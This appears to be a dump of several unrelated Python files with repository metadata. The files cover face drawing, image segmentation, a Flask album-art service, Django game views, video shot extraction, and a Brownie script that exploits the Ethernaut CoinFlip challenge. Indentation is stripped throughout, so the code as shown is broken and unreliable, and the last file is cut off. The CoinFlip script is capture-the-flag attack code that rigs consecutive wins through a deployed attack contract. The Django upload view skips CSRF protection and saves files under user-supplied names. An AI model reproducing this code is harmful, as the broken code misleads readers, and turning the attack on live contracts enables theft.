d.line(face_landmarks['bottom_lip'], fill=(150, 0, 0, 64), width=8)
'''
d.point(face_landmarks['left_eye'] + [face_landmarks['left_eye'][0]], fill=color)
d.point(face_landmarks['right_eye'] + [face_landmarks['right_eye'][0]], fill=color)
#print('deferfr', boxes)
for i in range(len(boxes)):
#print(boxes[i])
box = boxes[i][1]
#print(box[3], box[0]), (box[1], box[2])
color = colors[i%len(colors)]
d.rectangle(((box[3], box[0]), (box[1], box[2])), outline = color)
d.text((box[3], box[2]), text=boxes[i][0], fill = color)
#d.text((box[3], box[2]), text=str(boxes[i][2]), fill = color)
pil_image.save(out_loc, "JPEG")
def _buffer_image(filename):
image = cv2.imread(filename, )
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def get_image_details(path):
result = []
header = []
isHeader = True
with open(path) as csvfile:
reader = csv.reader(csvfile, delimiter=',')
dict_list = []
for row in reader:
if isHeader:
header = row
isHeader = False
else:
result.append(dict(zip(header, row)))
return result
def main(img_dir, result):
#for root, dirs, files in os.walk(img_dir):
#for file in glob.glob(os.path.join(img_dir,"**/*.csv")):
file = os.path.join(img_dir, os.path.join(os.path.basename(img_dir).replace('_jpg', '_jpg.csv')))
df_f = pd.read_csv(file)
#print(file)
boxes = []
#print(file)
for d in get_image_details(file):
if len(list(d.keys())) > 0:
parent_file = os.path.dirname(file).replace('_jpg', '.jpg')
#print(d)
bb = [int(s) for s in d['bb'].replace('L','').split(',') if s.isdigit()]
r = result[d['segment']]
df_f.loc[df_f['segment']==d['segment'], 'accuracy'] = r.accuracy
df_f.loc[df_f['segment']==d['segment'], 'name'] = r.person_name
boxes.append([r.person_name, bb, r.accuracy])
#print(os.path.dirname(file).replace('_jpg', '.jpg'))
out_path = os.path.dirname(file).replace('_jpg', '_processed.jpg')
#print('o',out_path)
_image = _buffer_image(os.path.dirname(file).replace('_jpg', '.jpg'))
draw_on_image(_image, out_path, boxes)
df_f.to_csv(file, index=False)
if __name__ == '__main__':
import os
import glob
import cv2
from align_dlib import AlignDlib
align_dlib = AlignDlib(os.path.join(os.path.dirname(__file__), 'transferredSkills/dlib_models/shape_predictor_68_face_landmarks.dat'))
def _buffer_image(filename):
image = cv2.imread(filename, )
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
out_dir = 'tests_output/draw_test'
if not os.path.exists(out_dir):
os.makedirs(out_dir)
image_paths = glob.glob(os.path.join('tests/crop_test', '**/*.jpg'))
for image in image_paths:
_image = _buffer_image(image)
boxes = [ align_dlib._getBoxCoordinates(b) for b in align_dlib.getAllFaceBoundingBoxes(_image)]
landmarks = align_dlib.facePoints( _image, boxes)
out_path = os.path.join(out_dir, os.path.basename(image)).replace('.jpg', '') + "_processed.jpg"
draw_on_image(_image, out_path, boxes, landmarks) | rtbins/MishMash-Dumbo | facial_recog_service/dragonEyes/modify_image.py | modify_image.py | py | 4,937 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "dragonEyes.align_dlib.AlignDlib",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "os.path.dir... |
72668388194 | # -*- coding: utf-8 -*-
"""
Created on Wed Aug 25 17:54:25 2021
@author: aktas
"""
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 24 20:14:29 2021
@author: aktas
"""
import cv2
import numpy as np
""" multiple seed region groowing image segmentation. Up to 5 seed can be selected """
def search_new_seed(classified_pixels, seed_x,seed_y,img, region_mean,threshold):
img_h, img_w = img.shape
for i in range(seed_x, img_w):
for k in range(seed_y, img_h):
if [i,k] in classified_pixels:
continue
if img[i][k] <= region_mean + threshold: #pick new seed
# print("found", i,k)
classified_pixels.append([i,k])
return [i,k]
# print("no neww seed")
return [-1,-1]
def region_growing(img, seed, threshold, connectivity):
img_height, img_width = img.shape
segmented_image = img.copy()
segmented_image = np.zeros((img_width,img_height), dtype=img.dtype)
segmented_image = [[element + 255 for element in sub_im] for sub_im in segmented_image]
# print(segmented_image)
seed_quantity = len(seed)
flags = [1] * seed_quantity # these flags will hold the info about "whether the seed continue growing or it stopped"
region_means = [0] * seed_quantity # region mean for each region (different region for each seed)
region_sizes = [1] * seed_quantity # region size for each region (different region for each seed)
label_list = [0] * seed_quantity # different label for each seed this list will be updated before growing starts
classified_pixels = [] # we shouldn't visite a neighbor pixel already classified in a region
visited_pixels_intensities_dif = [] # it wil keep intensity values of each neighbor pixel. After "minimmum" comparison, it well be cleared for the next tour
print("seed quantity",seed_quantity)
print("seeds",seed)
print("flags",flags)
print("im w im h")
print(img_width, img_height)
""" check if connectivity parameter is compatible"""
if connectivity == 4:
neighbor_pixels = [(-1, 0), (1, 0), (0, -1), (0, 1)]
elif connectivity == 8:
neighbor_pixels = [(-1, -1),(-1, 0), (-1, 1), (1, -1), (1, 0), (1, 1),(0, -1), (0, 1)]
else:
raise ValueError("Invalid connectivity choice! put 4 for 4-connectivity and 8 for 8-connectivity")
""" check if seed parameter is compatible"""
label = 0
for i in range(seed_quantity):
if seed[i][0] < img_width and seed[i][1] < img_height: # if the seed is compatible, initialize the necesseary parts for that seed
classified_pixels.append(seed[i].copy()) # we should keep the track list about the pixels to see if they are already visited or not
label_list[i] = label
segmented_image[seed[i][0]][seed[i][1]] = label #each seed has a unique label so we can keep the different regions via this labels
label += 20 # change the label for next seed
region_means[i] = img[seed[i][1]][seed[i][0]] #initialize region means with only seed intensities,
pass
else:
raise ValueError("Invalid seed selection, seed coordinates can't be out of image borders")
while len(classified_pixels) < img_height * img_width and 1 in flags:
for k in range(seed_quantity):
if flags[k] == 0:
continue
for i in range(connectivity):
tmpx_visited = seed[k][0] + neighbor_pixels[i][0]
tmpy_visited = seed[k][1] + neighbor_pixels[i][1]
if [tmpx_visited,tmpy_visited] in classified_pixels:
continue
if tmpx_visited < img_width and tmpx_visited >= 0 and tmpy_visited < img_height and tmpy_visited >= 0:
x_visited = tmpx_visited
y_visited = tmpy_visited
classified_pixels.append([seed[k][0] + neighbor_pixels[i][0],seed[k][1] + neighbor_pixels[i][1]])
if abs(img[y_visited][x_visited] - region_means[k]) <= threshold:
segmented_image[seed[k][1] + neighbor_pixels[i][1]][seed[k][0] + neighbor_pixels[i][0]] = label_list[k]
region_means[k] = (region_sizes[k] * region_means[k] + img[y_visited][x_visited] ) / (region_sizes[k] + 1)
region_sizes[k] += 1
last_x_accepted = seed[k][0] + neighbor_pixels[i][0]
last_y_accepted = seed[k][1] + neighbor_pixels[i][1]
if seed[k][0] == last_x_accepted and seed[k][1] == last_y_accepted:
new_seed = search_new_seed(classified_pixels,last_x_accepted, last_y_accepted,img, region_means[k],threshold)
if new_seed == [-1,-1]:
flags[k] = 0 #that seed cant grow anymore
else:
seed[k][0] = new_seed[0]
seed[k][1] = new_seed[1]
else:
seed[k][0] = last_x_accepted
seed[k][1] = last_y_accepted
# print(segmented_image)
# print("last seed was:", seed[k][0], seed[k][1])
return segmented_image
img = np.array([[1, 10, 10, 20, 50, 10, 50, 10],
[50, 1, 1, 1, 1, 1, 1, 10],
[20, 1, 1, 1, 1, 1, 1, 40],
[30, 1, 1, 0, 0, 1, 1, 50],
[40, 1, 1, 0, 0, 1, 1, 20],
[100, 1, 1, 1, 1, 1, 1, 30],
[10, 1, 1, 1, 1, 1, 1, 10],
[10, 100, 250, 250, 220, 200, 20, 10]])
print(img)
output = region_growing(img, [[1,1],[7,7]] ,5, 4)
print(output)
img2 = cv2.imread("bi2.jpg", 0)
img2 = cv2.resize(img2, (125,125))
output = region_growing(img2, [[60,60]] ,10, 8)
cv2.imshow("Segmented Image", np.array(output, dtype=img2.dtype))
cv2.waitKey(0)
cv2.destroyAllWindows()
| YCAyca/Image-Segmentation | Region_Growing/region_growing2.py | region_growing2.py | py | 6,262 | python | en | code | 3 | github-code | 1 | [
{
"api_name": "numpy.zeros",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": ... |
70755604514 | import unittest2
import os
import tempfile
import top
from top.utils.files import (copy_file,
remove_files,
get_directory_files_list)
class TestExporterDaemon(unittest2.TestCase):
@classmethod
def setUpClass(cls):
cls._ed = top.ExporterDaemon(pidfile=None)
cls._ed.set_business_units({'priority': 1, 'fast': 2, 'ipec': 3})
cls._ed._config = top.ExporterB2CConfig()
cls._ed._config.set_cond({'tolp': '000100000000010110',
'tolf': '000101100000010110',
'toli': '100010000000010110'})
cls._ed._config.set_file_bu({'tolp': 1,
'tolf': 2,
'tolf_nsw': 2,
'tolf_vic': 2,
'tolf_qld': 2,
'tolf_sa': 2,
'tolf_wa': 2,
'tolf_act': 2,
'toli': 3})
# Signature dir.
cls._signature_dir = tempfile.mkdtemp()
cls._ed._config.set_signature_dir(cls._signature_dir)
cls._sig_files = ['1.ps', '1.png', '5.ps', '5.png']
for f in cls._sig_files:
fh = open(os.path.join(cls._signature_dir, f), 'w')
fh.close()
# Exporter file closure dirs.
cls._exporter_dir = tempfile.mkdtemp()
cls._ed._config.set_exporter_dirs([cls._exporter_dir])
cls._ed._config.set_exporter_file_formats(['.*_RE[PIF]_\d{14}\.txt$'])
# Staging base.
cls._staging_dir = tempfile.mkdtemp()
cls._ed._config.set_staging_base(cls._staging_dir)
# Archive directory.
cls._archive_dir = tempfile.mkdtemp()
cls._ed._config.set_archive_dir(cls._archive_dir)
cls._ed.emailer.set_template_base(os.path.join('top', 'templates'))
# Call up front to pre-load the DB.
cls._ed._exporter = top.Exporter(**(cls._ed.exporter_kwargs))
cls._ed.set_exporter_fields({'tolp': '0,1,2,3,4,5,6',
'tolf': '0,1,2,3,4,5,6',
'toli': '0,1,2,3,4,5,6,7'})
db = cls._ed._exporter.db
fixture_dir = os.path.join('top', 'tests', 'fixtures')
fixtures = [{'db': db.agent, 'fixture': 'agents.py'},
{'db': db.identity_type,
'fixture': 'identity_type.py'},
{'db': db.job, 'fixture': 'jobs.py'},
{'db': db.jobitem, 'fixture': 'jobitems.py'}]
for i in fixtures:
fixture_file = os.path.join(fixture_dir, i['fixture'])
db.load_fixture(i['db'], fixture_file)
db.commit()
def test_init(self):
"""Intialise a ExporterDaemon object.
"""
msg = 'Not a top.ExporterDaemon object'
self.assertIsInstance(self._ed, top.ExporterDaemon, msg)
def test_start(self):
"""Start dry loop.
"""
old_dry = self._ed.dry
self._ed.set_dry()
self._ed._start(self._ed.exit_event)
# Clean up.
self._ed.set_dry(old_dry)
self._ed.exit_event.clear()
def test_start_non_dry(self):
"""Start non-dry loop.
"""
dry = False
old_dry = self._ed.dry
old_batch = self._ed.batch
old_support_emails = list(self._ed.support_emails)
test_file_dir = os.path.join('top', 'tests', 'files')
file = 'VIC_VANA_REP_20140214120000.txt'
copy_file(os.path.join(test_file_dir, file),
os.path.join(self._exporter_dir, file))
# Start processing.
self._ed.set_dry(dry)
self._ed.set_batch()
# Add valid email address here if you want to verify support comms.
self._ed.set_support_emails(None)
self._ed._start(self._ed.exit_event)
# Clean up.
self._ed.set_support_emails(old_support_emails)
self._ed.set_dry(old_dry)
self._ed.set_batch(old_batch)
self._ed.exit_event.clear()
@classmethod
def tearDownClass(cls):
del cls._ed
# Hardwired for now until we can think of a better way ...
sig_dir_1 = os.path.join(cls._archive_dir,
'signature',
'c4',
'c4ca',
'c4ca42',
'c4ca4238')
remove_files(get_directory_files_list(sig_dir_1))
sig_dir_5 = os.path.join(cls._archive_dir,
'signature',
'e4',
'e4da',
'e4da3b',
'e4da3b7f')
remove_files(get_directory_files_list(sig_dir_5))
os.removedirs(sig_dir_1)
os.removedirs(sig_dir_5)
os.removedirs(cls._exporter_dir)
for dir in ['priority', 'fast', 'ipec']:
out_dir = os.path.join(cls._staging_dir, dir, 'out')
remove_files(get_directory_files_list(out_dir))
os.removedirs(out_dir)
| loum/top | top/tests/test_exporterdaemon.py | test_exporterdaemon.py | py | 5,280 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "unittest2.TestCase",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "top.ExporterDaemon",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "top.ExporterB2CConfig",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "temp... |
20951729685 | from flask import Flask
from flask import jsonify
from flask import send_file
from flask_cors import CORS
from PIL import Image, ImageFilter, ImageDraw, ImageFont
import glob, os
import random
import logging
import PIL
import base64
from io import BytesIO
app = Flask(__name__)
CORS(app)
def drawText(image, text, coordinates):
draw = ImageDraw.Draw(image)
color = 'rgb(0, 0, 0)'
draw.text((coordinates[0], coordinates[1]), text, fill=color)
@app.route('/generate', methods=['GET'])
def generate():
BAND_NAMES = ['Porkchop Water', 'The Beets', 'Cooper and the Footies', 'Maggie Misdemeaner Elliot']
ALBUM_TITLES = ['Arghhh', 'I have something stuck in my throat', 'Is this real life']
IMAGE_ANGLES = [45, 90, 180, 360]
IMAGE_FILTERS = [
ImageFilter.BLUR,
ImageFilter.CONTOUR,
ImageFilter.DETAIL,
ImageFilter.EDGE_ENHANCE,
ImageFilter.EDGE_ENHANCE_MORE,
ImageFilter.EMBOSS,
ImageFilter.FIND_EDGES,
ImageFilter.SHARPEN,
ImageFilter.SMOOTH,
ImageFilter.SMOOTH_MORE
]
processed_images = []
index = 0
images = glob.glob('./assets/album_art/*')
random_image = random.choice(images)
current_image = Image.open(random_image)
resized_image = current_image.resize((300, 350), PIL.Image.ANTIALIAS)
album_title = random.choice(ALBUM_TITLES)
band_name = random.choice(BAND_NAMES)
(x, y, r, b) = resized_image.getbbox();
SPACING = len(album_title) * 8
drawText(resized_image, album_title, (r - SPACING, b - SPACING))
drawText(resized_image, band_name, (100, 100))
resized_image.rotate(random.choice(IMAGE_ANGLES))
resized_image.filter(random.choice(IMAGE_FILTERS))
album_name = 'album_art-' + str(index);
buffered = BytesIO()
resized_image.save(buffered, 'png', optimize=True)
return base64.b64encode(buffered.getvalue())
if __name__ == '__main__':
app.run() | ksotello/album_art_generator | server.py | server.py | py | 1,965 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw.Draw",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "PIL.ImageDraw",
"l... |
73152580515 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
from math import sin, cos, sqrt, atan2, radians
from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from django.core.files.storage import FileSystemStorage
from django.conf import settings
from django.http import JsonResponse
from rest_framework import viewsets
from general.models import *
from general.serializers import *
from rest_framework.decorators import detail_route
from rest_framework.response import Response
def index(request):
players = []
locations = []
if request.method == 'POST':
center = request.POST.get('center')
zoom = request.POST.get('zoom')
lats = [float(ii) for ii in request.POST.get('lats').split(', ')]
lngs = [float(ii) for ii in request.POST.get('lngs').split(', ')]
if request.user.is_authenticated() and request.user.home_field:
players = get_players_in_range(Player.objects.all(), request.user.home_field)
for loc in Location.objects.all().order_by('name'):
if lats[0] <= loc.lat <= lats[1] and lngs[0] <= loc.lng <= lngs[1]:
locations.append(loc)
else:
center = '38.60909, -121.3768'
zoom = 11
return render(request, 'index.html', {
'players': players,
'locations': locations,
'center': center,
'zoom': zoom
})
@login_required(login_url='/')
def profile(request):
games = GameEvent.objects.filter(datetime__gte=datetime.datetime.now(), players__in=[request.user]).order_by('datetime')
locations = Location.objects.all().order_by('name')
players = []
if request.user.home_field:
players = get_players_in_range(Player.objects.all(), request.user.home_field)
return render(request, 'profile.html', {
'games': games,
'players': players,
'num_players': Player.objects.all().count(),
'locations': locations
})
def location(request, id):
location = Location.objects.get(id=id)
games = location.events.filter(datetime__gte=datetime.datetime.now()) \
.order_by('datetime')
players = get_players_in_range(Player.objects.all(), location)
return render(request, 'location.html', {
'games': games,
'location': location,
'players': players,
})
def game(request, id):
game = GameEvent.objects.get(id=id)
return render(request, 'game.html', {
'game': game,
'players': Player.objects.all(),
})
def accept_invitation(request, code):
try:
gi = GameInvitation.objects.get(code=code)
gi.is_accepted = True
gi.save()
next = '/game/{}'.format(gi.game.id)
except Exception as e:
next = '/'
return redirect(next)
class LocationViewSet(viewsets.ModelViewSet):
queryset = Location.objects.all()
serializer_class = LocationSerializer
def perform_create(self, serializer):
serializer.save(created_by=self.request.user)
class GameEventViewSet(viewsets.ModelViewSet):
queryset = GameEvent.objects.all()
serializer_class = GameEventSerializer
def perform_create(self, serializer):
serializer.save(created_by=self.request.user)
@detail_route(methods=['POST'])
def join_game(self, request, *args, **kwargs):
game = self.get_object()
game.players.add(request.user)
game.save()
GameInvitation.objects.create(game=game, player=request.user, is_accepted=True, code="***")
return Response(status=200)
@detail_route(methods=['POST'])
def leave_game(self, request, *args, **kwargs):
game = self.get_object()
game.players.remove(request.user)
game.save()
GameInvitation.objects.filter(game=game, player=request.user).delete()
return Response(status=200)
@csrf_exempt
def upload_image(request):
myfile = request.FILES['images']
_type = request.POST.get('type', '')
if _type:
_type = _type + '/'
fs = FileSystemStorage()
filename = fs.save(_type+myfile.name, myfile)
uploaded_file_url = fs.url(filename)
res = {"image_url": uploaded_file_url,"image_name": uploaded_file_url.split('/')[-1]}
return JsonResponse(res, safe=False)
def calc_distance(lat1, lon1, lat2, lon2):
if lat1 and lon1 and lat2 and lon2:
radius = 6371 # km
dlat = radians(lat2 - lat1)
dlon = radians(lon2 - lon1)
a = (sin(dlat / 2) * sin(dlat / 2) +
cos(radians(lat1)) * cos(radians(lat2)) *
sin(dlon / 2) * sin(dlon / 2))
c = 2 * atan2(sqrt(a), sqrt(1 - a))
d = radius * c
return d
return settings.RANGE_RADIUS * 10
def get_players_in_range(players, loc):
players_ = []
for player in players:
if player.home_field:
if calc_distance(loc.lat, loc.lng, player.home_field.lat, player.home_field.lng) < settings.RANGE_RADIUS:
players_.append(player)
return players_
| donlafranchi/gfcmap | general/views.py | views.py | py | 5,156 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.shortcuts.render",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "... |
23466782671 | #!/usr/bin/python3
from brownie import interface, Attack
from scripts.deploy import deploy
from scripts.helpful_scripts import get_account
from colorama import Fore
# * colours
green = Fore.GREEN
red = Fore.RED
blue = Fore.BLUE
magenta = Fore.MAGENTA
reset = Fore.RESET
# * Rinkeby address : 0xFD7a732ca213EF549696c875c2A33b400a7B5609
FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968
def guessFlip(contract_address=None, attacker=None):
# ? getting the contract
if not contract_address:
# from web3 import Web3
# w3 = Web3(Web3.HTTPProvider("http://127.0.0.1:8545"))
coinflip_contract, owner = deploy()
contract_address = coinflip_contract.address
# ? Geeting the accounst for local testing
_, attacker = get_account()
else:
# from web3.auto.infura import w3
coinflip_contract = interface.CoinFlip(contract_address)
coinflip_attack = Attack.deploy(coinflip_contract, {"from": attacker})
print(
f"{green}Attacking contract deployed at: {magenta}{coinflip_attack.address}{reset}"
)
print(f"{red}Let's win this game!!{reset}")
for _ in range(10):
tx = coinflip_attack.attack(
{"from": attacker, "gas_limit": 100000, "allow_revert": True}
)
tx.wait(1)
# print(f"Current Win Streak: {coinflip_contract.consecutiveWins()}")
print(f"{green}Final Win Streak: {red}{coinflip_contract.consecutiveWins()}{reset}")
coinflip_attack.selfDestruct({"from": attacker})
"""
print(contract_address)
# ? variables
block_num = w3.eth.block_number
block_value = w3.eth.get_block(block_num - 1)["hash"].hex()
# print(block_num)
print(block_value)
#! for local testing
block_value = w3.eth.get_transaction_by_block(block_num - 1, 0)
block_value = "0xFD7A732CA213EF549696C875C2A33B400A7B5609"
block_value = w3.eth.get_block(block_num - 1)
block_value = w3.eth.get_transaction_by_block(block_num - 1, 0)["blockHash"].hex()
print(block_value)
print(w3.eth.get_block(block_num - 1)
exit(1)
coin_flip = int(int(block_value, 0) / FACTOR)
side = (lambda: True, lambda: False)[coin_flip == 1]()
print(coin_flip)
print(side)
exit(3)
"""
def main(contract_address=None):
if contract_address:
guessFlip(contract_address, get_account())
else:
guessFlip()
| Aviksaikat/Blockchain-CTF-Solutions | ethernaut/CoinFlip_DONE/scripts/guessFlips.py | guessFlips.py | py | 2,436 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "colorama.Fore.GREEN",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "colorama.Fore",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "colorama.Fore.RED",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "colorama.F... |
32012632909 | import os
import subprocess
import tempfile
from pathlib import Path
from typing import List
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from tqdm import tqdm
from metavideo import get_metagrid
from object_tracking_operations import (extract_masked_object_clips,
extract_obj_gifs_parallel,
extract_object_thumbs,
interpolate_missing_data,
merge_with_chromakey)
from utils import ensure_coords, ensure_dir, find_video_by_id, uniquify
def select_shots_by_entity(annotation_data: pd.DataFrame,
key: List[str], threshold=0.5,
search_categories=False,
padding_before=0,
padding_after=0):
"""
Select shots by key entity
:param annotation_data: dataframe with annotation data
:param key: key entity to filter by
:param threshold: minimum confidence score to consider
:param search_categories: search in categories as well
:param padding_before: amount of seconds to subtract from start time
:param padding_after: amount of seconds to add to end time
:return: dataframe with selected shots
"""
if type(key) == str:
key = [key]
if search_categories and 'category' not in annotation_data.columns:
raise KeyError("The dataframe has no 'category' column")
if 'entity' not in annotation_data.columns:
raise KeyError("The dataframe has no 'entity' column")
elif all(k not in annotation_data['entity'].unique() for k in key):
raise ValueError(f"Key entity {key} not found in dataframe")
entity_shots = annotation_data[annotation_data['entity'].str.lower().isin(key)].reset_index(drop=True)
if search_categories:
category_shots = annotation_data[annotation_data['category'].str.lower().isin(key)].reset_index(drop=True)
selected_shots = pd.concat([entity_shots, category_shots]).drop_duplicates(keep='first')
else:
selected_shots = entity_shots
selected_shots = selected_shots[selected_shots['confidence'] >= threshold].reset_index(drop=True)
if padding_before:
selected_shots['start_sec'] -= padding_before
selected_shots['start_sec'] = selected_shots['start_sec'].apply(lambda x: max(x, 0))
if padding_after:
end_time = entity_shots['end_sec'].max()
selected_shots['end_sec'] += padding_after
selected_shots['end_sec'] = selected_shots['end_sec'].apply(lambda x: max(x, end_time))
return selected_shots
def select_shots_by_keyword(annotation_data: pd.DataFrame,
key: List[str],
threshold=0.5,
padding_before=5,
padding_after=3):
key = [key.lower()] if type(key) == str else [k.lower() for k in key]
if 'word' not in annotation_data.columns:
raise KeyError("The dataframe has no 'word' column")
elif all(k not in annotation_data['word'].unique() for k in key):
raise ValueError(f"Keyword {key} not found in dataframe")
selected_shots = annotation_data[annotation_data['word'].str.lower().str.replace(r'[^\w\s]+', '').isin(key)]
selected_shots = selected_shots[selected_shots['confidence'] >= threshold]
selected_shots = add_padding_shots(annotation_data, padding_after, padding_before, selected_shots)
selected_shots = selected_shots.drop_duplicates(keep='first')
selected_shots = selected_shots.sort_index()
selected_shots = selected_shots.reset_index(drop=True)
starts = selected_shots['start_sec'].tolist()
ends = selected_shots['end_sec'].tolist()
selected_shots = merge_consecutive(selected_shots)
return selected_shots
def select_shots_by_consecutive_words(annotation_data: pd.DataFrame,
key: List[str]):
key = [k.lower().strip() for k in key] if isinstance(key, list) else [k.lower().strip() for k in key.split(',')]
annotation_data['word'] = annotation_data['word'].str.lower().str.replace(r'[^\w\s]+', '').str.strip()
selected_shots = pd.DataFrame()
indexes = annotation_data[annotation_data['word'].isin(key)].index.values
# for each index in indexes, get the following n indexes, where n is the length of the key
for i in indexes:
following_indexes = [i + j for j in range(len(key))]
# check that the 'word' column of the first row in the following_indexes list matches the first word in the key
# that the second row in the following_indexes list matches the second word in the key, etc.
if all(annotation_data.iloc[m]['word'] == key[n] for n, m in enumerate(following_indexes)):
# if all the words in the key match the words in the following_indexes list, append a new row to the
# selected_shots dataframe with the start and end times of the first and last rows in the following_indexes
# list, and the words in the key
selected_shots = selected_shots.append({
'id': annotation_data.iloc[following_indexes[0]]['id'],
'word': ' '.join(key),
'start_sec': annotation_data.iloc[following_indexes[0]]['start_sec'],
'end_sec': annotation_data.iloc[following_indexes[-1]]['end_sec'],
'id0': following_indexes[0],
'id1': following_indexes[-1]
}, ignore_index=True)
# selected_shots = selected_shots.append(annotation_data.iloc[following_indexes])
# remove duplicates and sort by index
selected_shots = selected_shots.drop_duplicates(keep='first')
selected_shots = selected_shots.sort_index()
return selected_shots
def merge_consecutive(selected_shots):
prev_len = len(selected_shots)
while True:
for i, row in selected_shots.iterrows():
if i < len(selected_shots) - 1:
current_end = float(row['end_sec'])
next_start = float(selected_shots.iloc[i + 1]['start_sec'])
if 0 <= next_start - current_end <= 2:
selected_shots.loc[i, "end_sec"] = selected_shots.iloc[i + 1]["end_sec"]
selected_shots.loc[i, "word"] = selected_shots.iloc[i]["word"] + " " + selected_shots.iloc[i + 1][
"word"]
selected_shots = selected_shots.drop(i + 1)
selected_shots = selected_shots.reset_index(drop=True)
current_len = len(selected_shots)
print("current_len: ", current_len, end="\r")
if current_len < prev_len:
prev_len = current_len
else:
break
return selected_shots
def add_padding_shots(annotation_data, padding_after, padding_before, selected_shots):
for n, shot in selected_shots.iterrows():
if n == 0:
continue
for i in range(1, padding_before + 1):
if n - i < 0:
break
current_start = int(shot['start_sec'])
previous_end = int(annotation_data.iloc[n - i]['end_sec'])
if current_start - previous_end <= 2:
selected_shots = selected_shots.append(annotation_data.iloc[n - i])
else:
break
for i in range(1, padding_after + 1):
if n + i > len(annotation_data):
break
current_end = int(shot['end_sec'])
next_start = int(annotation_data.iloc[n + i]['start_sec'])
diff = next_start - current_end
if next_start - current_end <= 2:
selected_shots = selected_shots.append(annotation_data.iloc[n + i])
else:
break
return selected_shots
def add_padding_to_consecutive_keywords(annotation_data, padding_after, padding_before, selected_shots):
for n, shot in selected_shots.iterrows():
if n == 0:
continue
for i in range(1, padding_before + 1):
if n - i < 0:
break
current_start = int(shot['start_sec'])
previous_end = int(annotation_data.iloc[shot['id0'] - i]['end_sec'])
if current_start - previous_end <= 2:
selected_shots = selected_shots.append(annotation_data.iloc[shot['id0'] - i])
else:
break
for i in range(1, padding_after + 1):
if n + i > len(annotation_data):
break
current_end = int(shot['end_sec'])
next_start = int(annotation_data.iloc[shot['id1'] + i]['start_sec'])
diff = next_start - current_end
if next_start - current_end <= 2:
selected_shots = selected_shots.append(annotation_data.iloc[shot['id1'] + i])
else:
break
print(selected_shots)
return selected_shots
def extract_shots(_df: pd.DataFrame, in_dir: Path, out_dir: Path, text: str = False):
"""
:param text:
:param out_dir:
:param in_dir:
:param _df: DataFrame with data on which shots to extract
:return: None
"""
df = _df.sort_values(by=['id', 'start_sec'])
out_dir.mkdir(parents=True, exist_ok=True)
for index, row in tqdm(df.iterrows(), total=df.shape[0], desc='Extracting shots'):
entity = row[text] if text else row[0]
video_id = row['id']
filename = Path(in_dir, find_video_by_id(row['id'], in_dir))
start = "%.2f" % row['start_sec']
end = "%.2f" % row['end_sec']
if start == end:
continue
in_path = filename.resolve().as_posix()
out_path = uniquify(os.path.join(out_dir.as_posix(), f"{video_id}.mp4"))
command = ["ffmpeg"]
options = ["-i", in_path, "-ss", start, "-to", end, "-y", "-movflags",
"faststart", "-avoid_negative_ts", "1", "-acodec", "copy", out_path]
if text:
text_filter = ["drawtext=", "fontfile=Inter-Regular.ttf:", f"text='{entity}':",
"fontcolor=white:", "fontsize=24:", "box=1:", "boxcolor=black@0.5:", "boxborderw=5:",
"x=(w-text_w)/2:", "y=24"]
filter_args = "".join(text_filter)
options.insert(6, "-vf")
options.insert(7, filter_args)
args = command + options
operation = subprocess.run(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
if operation.returncode != 0:
print(operation.stderr)
raise RuntimeError("Ué uagliù è succiesso nu guaio mentre stev tagliann e' video, liv 'a miezz "
"'stderr=subprocess.DEVNULL' e vir nu poc ch'è succiess")
# TODO add threading and hardware acceleration because this can get pretty long and boring
def merge_shots(in_dir: Path, out_dir: Path):
"""
Merge shots into one video
:param selected_shots_path: path to selected shots
:return: None
"""
out_dir.mkdir(parents=True, exist_ok=True)
files = [file.as_posix() for file in in_dir.glob('*.mp4')]
# select only files have an audio and a video stream
files = [file for file in files if len(subprocess.run(
["ffprobe", "-v", "error", "-select_streams", "a:0", "-show_entries", "stream=codec_type", "-of",
"default=noprint_wrappers=1:nokey=1", file],
stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()) > 0 and len(subprocess.run(
["ffprobe", "-v", "error", "-select_streams", "v:0", "-show_entries", "stream=codec_type", "-of",
"default=noprint_wrappers=1:nokey=1", file],
stdout=subprocess.PIPE).stdout.decode('utf-8').splitlines()) > 0]
files.sort()
out_path = uniquify(Path(out_dir, 'merged.mp4').as_posix())
command = ["ffmpeg"]
input_files = [["-i", file] for file in files]
input_files = [item for sublist in input_files for item in sublist]
streams = [f"[{i}:v][{i}:a]" for i in range(len(files))]
concat = [f"concat=n={len(files)}:v=1:a=1[v][a]"]
mapper = ['-map', '[v]', '-map', '[a]']
sync = ["-vsync", "2", '-threads', '0']
options = input_files + ["-filter_complex"] + [f"{''.join(streams + concat)}"] + mapper + sync + [out_path]
args = command + options
print(args)
operation = subprocess.run(args, stdout=subprocess.DEVNULL)
def agnostic_merge(video_dir, output_dir):
